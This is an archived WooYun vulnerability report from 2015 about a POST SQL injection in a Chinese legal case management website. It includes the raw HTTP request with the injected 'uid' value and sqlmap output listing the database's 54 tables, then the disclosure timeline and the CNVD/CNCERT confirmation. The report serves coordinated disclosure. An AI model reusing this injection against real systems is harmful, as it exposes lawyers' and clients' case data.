乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-15: 细节已通知厂商并且等待厂商处理中 2015-09-17: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开 2015-09-27: 细节向核心白帽子及相关领域专家公开 2015-10-07: 细节向普通白帽子公开 2015-10-17: 细节向实习白帽子公开 2015-11-01: 细节向公众公开
通过POST注入得到大量的律师信息,以及案件的审核和进行详情。
POST / HTTP/1.1Host: Content-Length: 220Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://**.**.**.**User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0Content-Type: application/x-www-form-urlencodedReferer: http://**.**.**.**/Accept-Encoding: gzip,deflateAccept-Language: zh-CN,zh;q=0.8Cookie: .ASPXANONYMOUS=JWdAjpwf0QEkAAAAZDk2ZTJjOTgtYTU1Zi00MmNlLTk4MTMtZWRiM2EyNjZhMjgxFsQxy1kHikbdBFV4AjHoWR05BnYhOXkBdMrUzVLTtB81__VIEWSTATE=%2FwEPDwULLTE0NDk3NTA4MzhkZFEtiL5ueyFL8bbJtX3FtxbYqoCfVBddg7xgRmd2dWFN&__EVENTVALIDATION=%2FwEdAAInt7ld8w4GtN3BLF9fjQIJRW4FbNZ7jLxhpNVSYZjUNYFhj9jDwpjFOf24vTgGGpsRSF1vMMik4KvvPgaNruTk&uid=a%27+&pwd=aaaa&_key=[11:10:15] [INFO] the SQL query used returns 54 entriesDatabase: Osgscn[54 tables]+------------------+| Day_Work || ERP_Class || ERP_Message || ERP_User || ERP_User_Log || FL_Class || FL_Dq || FL_Info || FL_Key || IOS_DB || IOS_Group_List || IOS_Group_User || IOS_Note || IOS_User || IOS_User_Group || IOS_Wrok || IOS_anli || IOS_anli_gd || IOS_del || IOS_pics || Ios_ShiWiSo || Ios_YJ || Ios_add_Log || Ios_anli_class || Ios_baoqian || Ios_money || LS_DQ || Law_Ask || Law_Class || Law_Good || Law_Gust || Law_Join || LogList || OA_Menu || Play_anli || Play_anli_Gd || Play_anli_user || QX_Group || Sou_Hot || User_Access || anil_baoqi_3 || anli_3 || anli_Falg || anli_Falg_Log || anli_OA_files || anli_class_3 || anli_faguan_3 || anli_files_3 || anli_log_3 || anli_tixin_3 || anli_work_3 || anli_work_list_3 || doin_3 || money_lx |+------------------+[11:10:15] [INFO] fetched data logged to text files under 'C:\Users\KING\.sqlmap\output\**.**.**.**'[*] shutting down at 11:10:15C:\Python27\sqlmap>
危害等级:高
漏洞Rank:11
确认时间:2015-09-17 16:57
CNVD确认并复现所述情况,已经转由CNCERT下发给广东分中心,由其后续协调网站管理单位处置。
暂无